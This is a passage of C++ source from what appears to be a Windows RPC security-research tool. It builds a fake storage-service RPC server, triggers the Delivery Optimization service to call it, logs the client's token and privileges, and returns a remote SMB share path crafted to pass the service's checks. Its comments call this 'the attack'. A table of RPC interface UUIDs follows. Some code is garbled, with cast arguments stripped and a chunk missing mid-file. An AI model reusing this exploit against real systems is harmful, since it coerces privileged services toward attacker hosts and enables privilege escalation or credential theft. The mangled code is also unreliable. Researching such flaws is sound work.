81 | wcout << L"Client Path: " << clientPath << endl; 82 | wcout << L"Service Name: " << serviceName << endl; 83 | wcout << L"OpNum: " << opNum << endl; 84 | } 85 | 86 | // The impersonation level lets us know what the server can do on behalf of the client 87 | wstring GetImpersonationLevel(HANDLE TokenHandle) 88 | { 89 | wstring impersonationLevel = L"not found"; 90 | SECURITY_IMPERSONATION_LEVEL levelEnum; 91 | DWORD returnLength = 0; 92 | if (!GetTokenInformation(TokenHandle, TokenImpersonationLevel, &levelEnum, sizeof(SECURITY_IMPERSONATION_LEVEL), &returnLength)) 93 | { 94 | // Avoid throwing exception inside security callback and log error instead 95 | cout << "GetTokenInformation for TokenImpersonationLevel failed " << TranslateCode(GetLastError()) << endl; 96 | return impersonationLevel; 97 | } 98 | switch (levelEnum) 99 | { 100 | case SecurityAnonymous: 101 | impersonationLevel = L"SecurityAnonymous"; 102 | break; 103 | case SecurityIdentification: 104 | impersonationLevel = L"SecurityIdentification"; 105 | break; 106 | case SecurityImpersonation: 107 | impersonationLevel = L"SecurityImpersonation"; 108 | break; 109 | case SecurityDelegation: 110 | impersonationLevel = L"SecurityDelegation"; 111 | break; 112 | } 113 | return impersonationLevel; 114 | } 115 | 116 | // Impersonate the RPC client to open a handle to its token 117 | HANDLE GetRpcClientToken(RPC_BINDING_HANDLE BindingHandle) 118 | { 119 | RPC_STATUS status = RpcImpersonateClient(BindingHandle); 120 | if (RPC_S_OK != status) 121 | { 122 | cout << "RpcImpersonateClient failed " << TranslateCode(status) << endl; 123 | return nullptr; 124 | } 125 | HANDLE threadToken = nullptr; 126 | BOOL success = OpenThreadToken(GetCurrentThread(), TOKEN_QUERY, TRUE, &threadToken); 127 | RpcRevertToSelfEx(BindingHandle); 128 | if (!success) 129 | { 130 | cout << "OpenThreadToken failed " << TranslateCode(GetLastError()) << endl; 131 | return nullptr; 132 | } 133 | return threadToken; 134 | } 135 | 136 | // Check which user connected to the server and what are the it's privileges 137 | void LogTokenInfo(RPC_BINDING_HANDLE BindingHandle) 138 | { 139 | HANDLE threadToken = GetRpcClientToken(BindingHandle); 140 | if (nullptr == threadToken) 141 | return; 142 | 143 | wstring impersonationLevel = GetImpersonationLevel(threadToken); 144 | wcout << L"impersonation level: " << impersonationLevel << endl; 145 | wstring username; 146 | wstring sid; 147 | GetSidAndUsername(threadToken, sid, username); 148 | wcout << L"client SID: " << sid << endl; 149 | wcout << L"client username: " << username << endl; 150 | CloseHandle(threadToken); 151 | } 152 | 153 | // Query data about the client from the binding handle 154 | void LogConnectionInfo(RPC_BINDING_HANDLE BindingHandle) 155 | { 156 | LogCallAttributes(BindingHandle); 157 | LogTokenInfo(BindingHandle); 158 | } 159 | 160 | // The security callback lets us know that a connection was made with the server 161 | RPC_STATUS RpcIfCallbackFn( 162 | RPC_IF_HANDLE InterfaceUuid, 163 | void* Context 164 | ) 165 | { 166 | wcout << L"Security callback" << endl; 167 | RPC_IF_HANDLE bindingHandle = reinterpret_cast(Context); 168 | LogConnectionInfo(bindingHandle); 169 | return RPC_S_OK; 170 | } 171 | 172 | void RegisterServer(RPC_IF_HANDLE Interface, wchar_t* Protseq, wchar_t* Endpoint, wchar_t* Annotation) 173 | { 174 | // Register the protocol sequence that will be used 175 | RPC_STATUS rpcStatus = RpcServerUseProtseqEpW(reinterpret_cast(Protseq), RPC_C_PROTSEQ_MAX_REQS_DEFAULT, reinterpret_cast(Endpoint), nullptr); 176 | if (RPC_S_OK != rpcStatus) 177 | ThrowException("RpcServerUseProtseqEpW failed", rpcStatus); 178 | 179 | // Register the interface that will be used 180 | rpcStatus = RpcServerRegisterIf2(Interface, nullptr, nullptr, RPC_IF_AUTOLISTEN, RPC_C_LISTEN_MAX_CALLS_DEFAULT, -1, RpcIfCallbackFn); 181 | if (RPC_S_OK != rpcStatus) 182 | ThrowException("RpcServerRegisterIf2 failed", rpcStatus); 183 | 184 | // Get the name of the dynamic endpoint that was generated 185 | RPC_BINDING_VECTOR* pbindingVector = 0; 186 | rpcStatus = RpcServerInqBindings(&pbindingVector); 187 | if (RPC_S_OK != rpcStatus) 188 | ThrowException("RpcServerInqBindings failed", rpcStatus); 189 | 190 | // Register the endpoint to the EPM 191 | rpcStatus = RpcEpRegisterW(Interface, pbindingVector, nullptr, reinterpret_cast(Annotation)); 192 | 193 | // Print data about the registration of the RPC server 194 | RPC_SERVER_INTERFACE* serverIf = reinterpret_cast(Interface); 195 | wstring uuid = UuidToWstring(&serverIf->InterfaceId.SyntaxGUID); 196 | wcout << L"UUID registered: " << uuid << endl; 197 | if (pbindingVector->Count > 0) 198 | { 199 | wstring endpointBindString = BindHandleToWstring(pbindingVector->BindingH[0]); 200 | wcout << L"Endpoint registered: " << endpointBindString << endl; 201 | } 202 | RpcBindingVectorFree(&pbindingVector); 203 | if (RPC_S_OK != rpcStatus) 204 | ThrowException("RpcEpRegisterW failed", rpcStatus); 205 | } 206 | 207 | // Delivery Optimization service is a DCOM server 208 | // Invoking IBackgroundCopyJob::CreateJob will cause it to call StorageUsage.dll!GetStorageDeviceInfo and connect to our RPC server 209 | void TriggerCreateJob(LPCWSTR JobName) 210 | { 211 | HRESULT hr = S_OK; 212 | hr = CoInitialize(nullptr); 213 | if (FAILED(hr)) 214 | ThrowException("CoInitialize failed", hr); 215 | 216 | IBackgroundCopyManager* copyManager = nullptr; 217 | hr = CoCreateInstance(CLSID_DeliveryOptimization, 218 | nullptr, 219 | CLSCTX_LOCAL_SERVER, 220 | IID_IBackgroundCopyManager, 221 | reinterpret_cast(©Manager)); 222 | 223 | if (FAILED(hr)) 224 | { 225 | CoUninitialize(); 226 | ThrowException("CoCreateInstance for IID_IBackgroundCopyManager failed", hr); 227 | } 228 | 229 | GUID guid = {}; 230 | IBackgroundCopyJob* copyJob = nullptr; 231 | hr = copyManager->CreateJob(JobName, BG_JOB_TYPE_DOWNLOAD, &guid, ©Job); 232 | copyManager->Release(); 233 | if (FAILED(hr)) 234 | { 235 | CoUninitialize(); 236 | ThrowException("IBackgroundCopyManager::CreateJob failed", hr); 237 | } 238 | wcout << L"Job created: " << UuidToWstring(&guid) << endl; 239 | copyJob->Complete(); 240 | copyJob->Release(); 241 | } 242 | 243 | // Check if the service is running to understand if the attack was executed too late 244 | void QueryStatusService(const wstring& ServiceName) 245 | { 246 | SC_HANDLE scHandle = OpenSCManagerW(nullptr, nullptr, SC_MANAGER_CONNECT); 247 | if (nullptr == scHandle) 248 | ThrowException("OpenSCManager failed", GetLastError()); 249 | 250 | SC_HANDLE serviceHandle = OpenServiceW(scHandle, ServiceName.c_str(), SERVICE_QUERY_STATUS); 251 | if (nullptr == serviceHandle) 252 | { 253 | CloseServiceHandle(scHandle); 254 | ThrowException("OpenServiceW failed", GetLastError()); 255 | } 256 | 257 | SERVICE_STATUS status = {}; 258 | if (!QueryServiceStatus(serviceHandle, &status)) 259 | { 260 | CloseServiceHandle(serviceHandle); 261 | CloseServiceHandle(scHandle); 262 | ThrowException("QueryServiceStatus failed", GetLastError()); 263 | } 264 | 265 | wcout << ServiceName <PathName[0], 0, sizeof(STORAGE_DEVICE_INFO) - sizeof(unsigned int)); 410 | 411 | // Write an SMB share to DeviceInfo->PathName 412 | wstring pathName = L"\\\\"; 413 | pathName.append(g_RemoteServer); 414 | pathName.append(L"\\Share"); 415 | wcout << L"Setting DeviceInfo->PathName to: " << pathName << endl; 416 | wcsncpy_s(DeviceInfo->PathName, sizeof(DeviceInfo->PathName) / sizeof(wchar_t), pathName.c_str(), pathName.size()); 417 | 418 | // Return specific values to pass the checks made by dosvc.dll!CServiceCallback::GetAppInstallPath 419 | DeviceInfo->DeviceProperties = STORAGE_PROPERTY_NONE; 420 | DeviceInfo->PresenceState = STORAGE_PRESENCE_MOUNTED; 421 | DeviceInfo->VolumeStatus = STORAGE_STATUS_NORMAL; 422 | return 0; 423 | } 424 | 425 | long CleanupItem( 426 | /* [in] */ handle_t IDL_handle) { 427 | wcout << L"CleanupItem called" << endl; return 0; 428 | } 429 | 430 | long SvcRebootToFlashingMode( 431 | /* [in] */ handle_t IDL_handle) { 432 | wcout << L"SvcRebootToFlashingMode called" << endl; return 0; 433 | } 434 | 435 | long SvcRebootToUosFlashing( 436 | /* [in] */ handle_t IDL_handle) { 437 | wcout << L"SvcRebootToUosFlashing called" << endl; return 0; 438 | } 439 | 440 | long SvcFinalizeVolume( 441 | /* [in] */ handle_t IDL_handle) { 442 | wcout << L"SvcFinalizeVolume called" << endl; return 0; 443 | } 444 | 445 | long SvcGetStorageSettings( 446 | /* [in] */ handle_t IDL_handle, 447 | /* [in] */ STORAGE_DEVICE_TYPE DeviceType, 448 | /* [in] */ DWORD DeviceIndex, 449 | /* [in] */ STORAGE_SETTING SettingsType, 450 | /* [out] */ LPDWORD SettingsValue) { 451 | wcout << L"SvcGetStorageSettings called" << endl; 452 | 453 | // Return specific values that will cause dosvc.dll!CServiceCallback::GetAppInstallPath to call GetStorageDeviceInfo 454 | *SettingsValue = 0x10; 455 | return 0; 456 | } 457 | 458 | long SvcResetStoragePolicySettings( 459 | /* [in] */ handle_t IDL_handle) { 460 | wcout << L"SvcResetStoragePolicySettings called" << endl; return 0; 461 | } 462 | 463 | long SvcSetStorageSettings( 464 | /* [in] */ handle_t IDL_handle) { 465 | wcout << L"SvcSetStorageSettings called" << endl; return 0; 466 | } 467 | 468 | long SvcTriggerStorageCleanup( 469 | /* [in] */ handle_t IDL_handle) { 470 | wcout << L"SvcTriggerStorageCleanup called" << endl; return 0; 471 | } 472 | 473 | long SvcTriggerLowStorageNotification( 474 | /* [in] */ handle_t IDL_handle) { 475 | wcout << L"SvcTriggerLowStorageNotification called" << endl; return 0; 476 | } 477 | 478 | long SvcMoveFileInheritSecurity( 479 | /* [in] */ handle_t IDL_handle) { 480 | wcout << L"SvcMoveFileInheritSecurity called" << endl; return 0; 481 | } 482 | 483 | long SvcScanVolume( 484 | /* [in] */ handle_t IDL_handle) { 485 | wcout << L"SvcScanVolume called" << endl; return 0; 486 | } 487 | 488 | long SvcProcessStorageCardChange( 489 | /* [in] */ handle_t IDL_handle) { 490 | wcout << L"SvcProcessStorageCardChange called" << endl; return 0; 491 | } 492 | 493 | long SvcProvisionForAppInstall( 494 | /* [in] */ handle_t IDL_handle) { 495 | wcout << L"SvcProvisionForAppInstall called" << endl; return 0; 496 | } 497 | 498 | long SvcGetStorageInstanceCountForMaps( 499 | /* [in] */ handle_t IDL_handle) { 500 | wcout << L"SvcGetStorageInstanceCountForMaps called" << endl; return 0; 501 | } 502 | 503 | long SvcGetStoragePolicySettings( 504 | /* [in] */ handle_t IDL_handle) { 505 | wcout << L"SvcGetStoragePolicySettings called" << endl; return 0; 506 | } 507 | 508 | long SvcSetStoragePolicySettings( 509 | /* [in] */ handle_t IDL_handle) { 510 | wcout << L"SvcSetStoragePolicySettings called" << endl; return 0; 511 | } 512 | 513 | long SvcTriggerStoragePolicies( 514 | /* [in] */ handle_t IDL_handle) { 515 | wcout << L"SvcTriggerStoragePolicies called" << endl; return 0; 516 | } 517 | 518 | long SvcTriggerStorageOptimization( 519 | /* [in] */ handle_t IDL_handle) { 520 | wcout << L"SvcTriggerStorageOptimization called" << endl; return 0; 521 | } 522 | 523 | long SvcPredictStorageHealth( 524 | /* [in] */ handle_t IDL_handle) { 525 | wcout << L"SvcPredictStorageHealth called" << endl; return 0; 526 | } 527 | 528 | long SvcGetLastFailedSaveLocationPath( 529 | /* [in] */ handle_t IDL_handle) { 530 | wcout << L"SvcGetLastFailedSaveLocationPath called" << endl; return 0; 531 | } 532 | 533 | long SvcExecuteRemoveUserFiles( 534 | /* [in] */ handle_t IDL_handle) { 535 | wcout << L"SvcExecuteRemoveUserFiles called" << endl; return 0; 536 | } 537 | 538 | long SvcExecuteDehydrateUserFiles( 539 | /* [in] */ handle_t IDL_handle) { 540 | wcout << L"SvcExecuteDehydrateUserFiles called" << endl; return 0; 541 | } 542 | 543 | long SvcGetStorageDeviceSize( 544 | /* [in] */ handle_t IDL_handle) { 545 | wcout << L"SvcGetStorageDeviceSize called" << endl; return 0; 546 | } 547 | 548 | long SvcGetStoragePolicyDefaultValue( 549 | /* [in] */ handle_t IDL_handle) { 550 | wcout << L"SvcGetStoragePolicyDefaultValue called" << endl; return 0; 551 | } 552 | 553 | long SvcGetStorageDeviceLowDiskState( 554 | /* [in] */ handle_t IDL_handle) { 555 | wcout << L"SvcGetStorageDeviceLowDiskState called" << endl; return 0; 556 | } 557 | 558 | long SvcGetStorageDeviceLowDiskState2( 559 | /* [in] */ handle_t IDL_handle) { 560 | wcout << L"SvcGetStorageDeviceLowDiskState2 called" << endl; return 0; 561 | } 562 | 563 | long SvcSilentCleanupTaskSetEnabledState( 564 | /* [in] */ handle_t IDL_handle) { 565 | wcout << L"SvcSilentCleanupTaskSetEnabledState called" << endl; return 0; 566 | } 567 | 568 | long SvcSilentCleanupTaskGetEnabledState( 569 | /* [in] */ handle_t IDL_handle) { 570 | wcout << L"SvcSilentCleanupTaskGetEnabledState called" << endl; return 0; 571 | } 572 | 573 | long SvcGetStoragePoliciesLastTriggerTime( 574 | /* [in] */ handle_t IDL_handle) { 575 | wcout << L"SvcGetStoragePoliciesLastTriggerTime called" << endl; return 0; 576 | } 577 | 578 | long SvcSetStoragePoliciesLastTriggerTime( 579 | /* [in] */ handle_t IDL_handle) { 580 | wcout << L"SvcSetStoragePoliciesLastTriggerTime called" << endl; return 0; 581 | } 582 | 583 | long SvcGetSmartAttributes( 584 | /* [in] */ handle_t IDL_handle) { 585 | wcout << L"SvcGetSmartAttributes called" << endl; return 0; 586 | } -------------------------------------------------------------------------------- /RPC-Recon/GuidMaps.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | 4 | std::unordered_map KNOWN_UUIDS = { 5 | { L"975201B0-59CA-11D0-A8D5-00A0C90D8051", L"rpcss.dll" }, 6 | { L"C9378FF1-16F7-11D0-A0B2-00AA0061426A", L"pstorsvc.dll" }, 7 | { L"0D72A7D4-6148-11D1-B4AA-00C04FB66EA0", L"cryptsvc.dll" }, 8 | { L"8D9F4E40-A03D-11CE-8F69-08003E30051B", L"services.exe" }, 9 | { L"DA5A86C5-12C2-4943-AB30-7F74A813D853", L"regsvc.dll" }, 10 | { L"FB8A0729-2D04-4658-BE93-27B4AD553FAC", L"lsass.exe" }, 11 | { L"52D9F704-D3C6-4748-AD11-2550209E80AF", L"IMEPADSM.DLL" }, 12 | { L"C421ADCE-A0B2-480D-8418-984495B32D5F", L"SLsvc.exe" }, 13 | { L"D3FBB514-0E3B-11CB-8FAD-08002B1D29C3", L"locator.exe" }, 14 | { L"F61C406F-BD60-4194-9565-BFEDD5256F70", L"p2phost.exe" }, 15 | { L"C13D3372-CC20-4449-9B23-8CC8271B3885", L"rpcrt4.dll" }, 16 | { L"D95AFE70-A6D5-4259-822E-2C84DA1DDB0D", L"wininit.exe" }, 17 | { L"552D076A-CB29-4E44-8B6A-D15E59E2C0AF", L"iphlpsvc.dll" }, 18 | { L"D4254F95-08C3-4FCC-B2A6-0B651377A29D", L"wwansvc.dll" }, 19 | { L"11899A43-2B68-4A76-92E3-A3D6AD8C26CE", L"lsm.exe" }, 20 | { L"266F33B4-C7C1-4BD1-8F52-DDB8F2214EA9", L"wlansvc.dll" }, 21 | { L"2ACB9D68-B434-4B3E-B966-E06B4B3A84CB", L"bthserv.dll" }, 22 | { L"57674CD0-5200-11CE-A897-08002B2E9C6D", L"llssrv.exe" }, 23 | { L"647D4452-9F33-4A18-B2BE-C5C0E920E94E", L"pla.dll" }, 24 | { L"DE3B9BC8-BEF7-4578-A0DE-F089048442DB", L"audiodg.exe" }, 25 | { L"BFA951D1-2F0E-11D3-BFD1-00C04FA3490A", L"aqueue.dll" }, 26 | { L"1E665584-40FE-4450-8F6E-802362399694", L"lsm.exe" }, 27 | { L"AA177641-FC9B-41BD-80FF-F964A701596F", L"tssdis.exe" }, 28 | { L"906B0CE0-C70B-1067-B317-00DD010662DA", L"msdtcprx.dll" }, 29 | { L"FD6BB951-C830-4734-BF2C-18BA6EC7AB49", L"iscsiexe.dll" }, 30 | { L"621DFF68-3C39-4C6C-AAE3-E68E2C6503AD", L"wzcsvc.dll" }, 31 | { L"9435CC56-1D9C-4924-AC7D-B60A2C3520E1", L"sppsvc.exe" }, 32 | { L"369CE4F0-0FDC-11D3-BDE8-00C04F8EEE78", L"profmap.dll" }, 33 | { L"3919286A-B10C-11D0-9BA8-00C04FD92EF5", L"lsasrv.dll" }, 34 | { L"76D12B80-3467-11D3-91FF-0090272F9EA3", L"mqqm.dll" }, 35 | { L"8D0FFE72-D252-11D0-BF8F-00C04FD9126B", L"cryptsvc.dll" }, 36 | { L"68DCD486-669E-11D1-AB0C-00C04FC2DCD2", L"ismserv.exe" }, 37 | { L"1FE1AF83-C95D-9111-A408-002B14A0FA03", L"rpcss.dll" }, 38 | { L"24019106-A203-4642-B88D-82DAE9158929", L"authui.dll" }, 39 | { L"5CA4A760-EBB1-11CF-8611-00A0245420ED", L"termsrv.dll" }, 40 | { L"3473DD4D-2E88-4006-9CBA-22570909DD10", L"winhttp.dll" }, 41 | { L"B97DB8B2-4C63-11CF-BFF6-08002BE23F2F", L"clussvc.exe" }, 42 | { L"33511F95-5B84-4DCC-B6CC-3F4B21DA53E1", L"ubpm.dll" }, 43 | { L"05EBB278-E114-4EC1-A5A3-096153F300E4", L"tsgqec.dll" }, 44 | { L"63FBE424-2029-11D1-8DB8-00AA004ABD5E", L"Sens.dll" }, 45 | { L"0767A036-0D22-48AA-BA69-B619480F38CB", L"pcasvc.dll" }, 46 | { L"2F5F3220-C126-1076-B549-074D078619DA", L"netdde.exe" }, 47 | { L"FDB3A030-065F-11D1-BB9B-00A024EA5525", L"mqqm.dll" }, 48 | { L"77DF7A80-F298-11D0-8358-00A024C480A8", L"mqdssrv.dll" }, 49 | { L"98716D03-89AC-44C7-BB8C-285824E51C4A", L"srvsvc.dll" }, 50 | { L"4F32ADC8-6052-4A04-8701-293CCF2096F0", L"sspisrv.dll" }, 51 | { L"65A93890-FAB9-43A3-B2A5-1E330AC28F11", L"dnsrslvr.dll" }, 52 | { L"C503F532-443A-4C69-8300-CCD1FBDB3839", L"MpSvc.dll" }, 53 | { L"C33B9F46-2088-4DBC-97E3-6125F127661C", L"nlasvc.dll" }, 54 | { L"A002B3A0-C9B7-11D1-AE88-0080C75E4EC1", L"wlnotify.dll" }, 55 | { L"8833D1D0-965F-4216-B3E9-FBE58CAD3100", L"SCardSvr.dll" }, 56 | { L"6BFFD098-A112-3610-9833-46C3F87E345A", L"wkssvc.dll" }, 57 | { L"7E048D38-AC08-4FF1-8E6B-F35DBAB88D4A", L"mqqm.dll" }, 58 | { L"E3514235-4B06-11D1-AB04-00C04FC2DCD2", L"ntdsai.dll" }, 59 | { L"4B324FC8-1670-01D3-1278-5A47BF6EE188", L"srvsvc.dll" }, 60 | { L"3C4728C5-F0AB-448B-BDA1-6CE01EB0A6D6", L"dhcpcsvc6.dll" }, 61 | { L"00000136-0000-0000-C000-000000000046", L"rpcss.dll" }, 62 | { L"3D267954-EEB7-11D1-B94E-00C04FA3080D", L"lserver.dll" }, 63 | { L"811109BF-A4E1-11D1-AB54-00A0C91E9B45", L"WINS.EXE" }, 64 | { L"7AF5BBD0-6063-11D1-AE2A-0080C75E4EC1", L"irmon.dll" }, 65 | { L"12B81E99-F207-4A4C-85D3-77B42F76FD14", L"seclogon.dll" }, 66 | { L"00645E6C-FC9F-4A0C-9896-F00B66297798", L"icardagt.exe" }, 67 | { L"B15B2F9F-903C-4671-8DC0-772C54214068", L"pwmig.dll" }, 68 | { L"497D95A6-2D27-4BF5-9BBD-A6046957133C", L"termsrv.dll" }, 69 | { L"5CBE92CB-F4BE-45C9-9FC9-33E73E557B20", L"lsasrv.dll" }, 70 | { L"69510FA1-2F99-4EEB-A4FF-AF259F0F9749", L"wecsvc.dll" }, 71 | { L"8CFB5D70-31A4-11CF-A7D8-00805F48A135", L"smtpsvc.dll" }, 72 | { L"77850D46-851D-43B6-9398-290161F0CAE6", L"SeVA.dll" }, 73 | { L"76F226C3-EC14-4325-8A99-6A46348418AF", L"winlogon.exe" }, 74 | { L"0B0A6584-9E0F-11CF-A3CF-00805F68CB1B", L"rpcss.dll" }, 75 | { L"11F25515-C879-400A-989E-B074D5F092FE", L"lsm.exe" }, 76 | { L"894DE0C0-0D55-11D3-A322-00C04FA321A1", L"wininit.exe" }, 77 | { L"F50AAC00-C7F3-428E-A022-A6B71BFB9D43", L"cryptsvc.dll" }, 78 | { L"30B044A5-A225-43F0-B3A4-E060DF91F9C1", L"certprop.dll" }, 79 | { L"12345778-1234-ABCD-EF00-0123456789AB", L"lsasrv.dll" }, 80 | { L"98E96949-BC59-47F1-92D1-8C25B46F85C7", L"wlanext.exe" }, 81 | { L"FFE561B8-BF15-11CF-8C5E-08002BB49649", L"clussvc.exe" }, 82 | { L"F5CC59B4-4264-101A-8C59-08002B2F8426", L"ntfrs.exe" }, 83 | { L"50ABC2A4-574D-40B3-9D66-EE4FD5FBA076", L"dns.exe" }, 84 | { L"873F99B9-1B4D-9910-B7AA-0004007F0701", L"ssmsrp70.dll" }, 85 | { L"B253C301-78A2-4270-A91F-660DEE069F4C", L"rdpcore.dll" }, 86 | { L"22716894-FD8E-4462-9783-09E6D9531F16", L"ubpm.dll" }, 87 | { L"D335B8F6-CB31-11D0-B0F9-006097BA4E54", L"polagent.dll" }, 88 | { L"0C821D64-A3FC-11D1-BB7A-0080C75E4EC1", L"irftp.exe" }, 89 | { L"4D9F4AB8-7D1C-11CF-861E-0020AF6E7C57", L"rpcss.dll" }, 90 | { L"81EE95A8-882E-4615-888A-53344CA149E4", L"vpnikeapi.dll" }, 91 | { L"130CEEFB-E466-11D1-B78B-00C04FA32883", L"ismip.dll" }, 92 | { L"C6F3EE72-CE7E-11D1-B71E-00C04FC3111A", L"rpcss.dll" }, 93 | { L"201EF99A-7FA0-444C-9399-19BA84F12A1A", L"appinfo.dll" }, 94 | { L"6D9FE472-30F1-4708-8FA8-678362B96155", L"wimserv.exe" }, 95 | { L"7C44D7D4-31D5-424C-BD5E-2B3E1F323D22", L"ntdsai.dll" }, 96 | { L"6F201A55-A24D-495F-AAC9-2F4FCE34DF99", L"IPHLPAPI.DLL" }, 97 | { L"300F3532-38CC-11D0-A3F0-0020AF6B0ADD", L"trkwks.dll" }, 98 | { L"4F82F460-0E21-11CF-909E-00805F48A135", L"nntpsvc.dll" }, 99 | { L"5F54CE7D-5B79-4175-8584-CB65313A0E98", L"appinfo.dll" }, 100 | { L"82273FDC-E32A-18C3-3F78-827929DC23EA", L"wevtsvc.dll" }, 101 | { L"16E0CF3A-A604-11D0-96B1-00A0C91ECE30", L"ntdsbsrv.dll" }, 102 | { L"6BFFD098-A112-3610-9833-012892020162", L"browser.dll" }, 103 | { L"484809D6-4239-471B-B5BC-61DF8C23AC48", L"lsm.exe" }, 104 | { L"58E604E8-9ADB-4D2E-A464-3B0683FB1480", L"appinfo.dll" }, 105 | { L"A2D47257-12F7-4BEB-8981-0EBFA935C407", L"p2psvc.dll" }, 106 | { L"6B5BDD1E-528C-422C-AF8C-A4079BE4FE48", L"FwRemoteSvr.dll" }, 107 | { L"51C82175-844E-4750-B0D8-EC255555BC06", L"SLsvc.exe" }, 108 | { L"12345778-1234-ABCD-EF00-0123456789AC", L"samsrv.dll" }, 109 | { L"B3DF47C0-A95A-11CF-AA26-00AA00C148B9", L"mspadmin.exe - Microsoft ISA Server" }, 110 | { L"EA0A3165-4834-11D2-A6F8-00C04FA346CC", L"FXSSVC.exe" }, 111 | { L"D674A233-5829-49DD-90F0-60CF9CEB7129", L"ipnathlp.dll" }, 112 | { L"F6BEAFF7-1E19-4FBB-9F8F-B89E2018337C", L"wevtsvc.dll" }, 113 | { L"ECEC0D70-A603-11D0-96B1-00A0C91ECE30", L"ntdsbsrv.dll" }, 114 | { L"4F83DA7C-D2E8-9811-0700-C04F8EC85002", L"sfc.dll" }, 115 | { L"46EA9280-5BBF-445E-831D-41D0F60F503A", L"ifssvc.exe" }, 116 | { L"367ABB81-9844-35F1-AD32-98F038001003", L"services.exe" }, 117 | { L"629B9F66-556C-11D1-8DD2-00AA004ABD5E", L"sens.dll" }, 118 | { L"A00C021C-2BE2-11D2-B678-0000F87A8F8E", L"ntfrs.exe" }, 119 | { L"C386CA3E-9061-4A72-821E-498D83BE188F", L"audiosrv.dll" }, 120 | { L"E76EA56D-453F-11CF-BFEC-08002BE23F2F", L"resrcmon.exe" }, 121 | { L"4A72BFE1-9294-11DA-A72B-0800200C9A66", L"rdpinit.exe" }, 122 | { L"A2C45F7C-7D32-46AD-96F5-ADAFB486BE74", L"services.exe" }, 123 | { L"45776B01-5956-4485-9F80-F428F7D60129", L"dnsrslvr.dll" }, 124 | { L"6C9B7B96-45A8-4CCA-9EB3-E21CCF8B5A89", L"umpo.dll" }, 125 | { L"9D420415-B8FB-4F4A-8C53-4502EAD30CA9", L"PlaySndSrv.dll" }, 126 | { L"15CD3850-28CA-11CE-A4E8-00AA006116CB", L"PeerDistSvc.dll" }, 127 | { L"A398E520-D59A-4BDD-AA7A-3C1E0303A511", L"IKEEXT.DLL" }, 128 | { L"E1AF8308-5D1F-11C9-91A4-08002B14A0FA", L"rpcss.dll" }, 129 | { L"83DA7C00-E84F-11D2-9807-00C04F8EC850", L"sfc_os.dll" }, 130 | { L"4A51DCF2-5C3A-4DD2-84DB-C3802EE7F9B7", L"ntdsai.dll" }, 131 | { L"1FF70682-0A51-30E8-076D-740BE8CEE98B", L"taskcomp.dll" }, 132 | { L"3F99B900-4D87-101B-99B7-AA0004007F07", L"ssmsrpc.dll - Microsoft SQL Server" }, 133 | { L"5B821720-F63B-11D0-AAD2-00C04FC324DB", L"dhcpssvc.dll" }, 134 | { L"4DA1C422-943D-11D1-ACAE-00C04FC2AA3F", L"trksvr.dll" }, 135 | { L"1AA5E974-6282-4E8D-9C96-40186E89D280", L"scss.exe" }, 136 | { L"1A927394-352E-4553-AE3F-7CF4AAFCA620", L"wdssrv.dll" }, 137 | { L"048CF666-AB42-42B4-8975-1357018DECB3", L"ws2_32.dll" }, 138 | { L"00000002-0001-0000-C000-000000000069", L"kdcsvc.dll" }, 139 | { L"378E52B0-C0A9-11CF-822D-00AA0051E40F", L"taskcomp.dll" }, 140 | { L"8C7A6DE0-788D-11D0-9EDF-444553540000", L"wiaservc.dll" }, 141 | { L"3CA78105-A3A3-4A68-B458-1A606BAB8FD6", L"mpnotify.exe" }, 142 | { L"B58AA02E-2884-4E97-8176-4EE06D794184", L"sysmain.dll" }, 143 | { L"D4254F95-08C3-4FCC-B2A6-0B651377A29C", L"wwansvc.dll" }, 144 | { L"C3F42C6E-D4CC-4E5A-938B-9C5E8A5D8C2E", L"wlanmsm.dll" }, 145 | { L"F3190C53-4E0C-491A-AAD3-2A7CEB7E25D4", L"vpnikeapi.dll" }, 146 | { L"ACE1C026-8B3F-4711-8918-F345D17F5BFF", L"lsasrv.dll" }, 147 | { L"AE55C4C0-64CE-11DD-AD8B-0800200C9A66", L"bdesvc.dll" }, 148 | { L"E33C0CC4-0482-101A-BC0C-02608C6BA218", L"locator.exe" }, 149 | { L"506C3B0E-4BD1-4C56-88C0-49A20ED4B539", L"milcore.dll" }, 150 | { L"2EB08E3E-639F-4FBA-97B1-14F878961076", L"gpsvc.dll" }, 151 | { L"C9AC6DB5-82B7-4E55-AE8A-E464ED7B4277", L"sysntfy.dll" }, 152 | { L"A0BC4698-B8D7-4330-A28F-7709E18B6108", L"Sens.dll" }, 153 | { L"3F31C91E-2545-4B7B-9311-9529E8BFFEF6", L"p2psvc.dll" }, 154 | { L"5A7B91F8-FF00-11D0-A9B2-00C04FB6E6FC", L"msgsvc.dll" }, 155 | { L"6BFFD098-A112-3610-9833-46C3F874532D", L"dhcpssvc.dll" }, 156 | { L"E248D0B8-BF15-11CF-8C5E-08002BB49649", L"clussvc.exe" }, 157 | { L"1CBCAD78-DF0B-4934-B558-87839EA501C9", L"lsasrv.dll" }, 158 | { L"C8CB7687-E6D3-11D2-A958-00C04F682E16", L"WebClnt.dll" }, 159 | { L"C681D488-D850-11D0-8C52-00C04FD90F7E", L"lsasrv.dll" }, 160 | { L"5B5B3580-B0E0-11D1-B92D-0060081E87F0", L"mqqm.dll" }, 161 | { L"ED8F09F0-CEB7-BB11-D200-001A181CAD00", L"mprdim.dll" }, 162 | { L"12E65DD8-887F-41EF-91BF-8D816C42C2E7", L"winlogon.exe" }, 163 | { L"5A7B91F8-FF00-11D0-A9B2-00C04FB636FC", L"msgsvc.dll" }, 164 | { L"338CD001-2244-31F1-AAAA-900038001003", L"regsvc.dll" }, 165 | { L"17FDD703-1827-4E34-79D4-24A55C53BB37", L"msgsvc.dll" }, 166 | { L"3357951C-A1D1-47DB-A278-AB945D063D03", L"LBService.dll" }, 167 | { L"C100BEAB-D33A-4A4B-BF23-BBEF4663D017", L"wcncsvc.dll" }, 168 | { L"827BFCC4-38B4-4ACD-92E4-21E1506B85FB", L"SLsvc.exe" }, 169 | { L"8F09F000-B7ED-11CE-BBD2-00001A181CAD", L"mprdim.dll" }, 170 | { L"7212A04B-B463-402E-9649-2BA477394676", L"umrdp.dll" }, 171 | { L"2F5F6520-CA46-1067-B319-00DD010662DA", L"tapisrv.dll" }, 172 | { L"69C09EA0-4A09-101B-AE4B-08002B349A02", L"ole32.dll" }, 173 | { L"88143FD0-C28D-4B2B-8FEF-8D882F6A9390", L"lsm.exe" }, 174 | { L"E60C73E6-88F9-11CF-9AF1-0020AF6E72F4", L"rpcss.dll" }, 175 | { L"DE79FC6C-DC6F-43C7-A48E-63BBC8D4009D", L"rdpclip.exe" }, 176 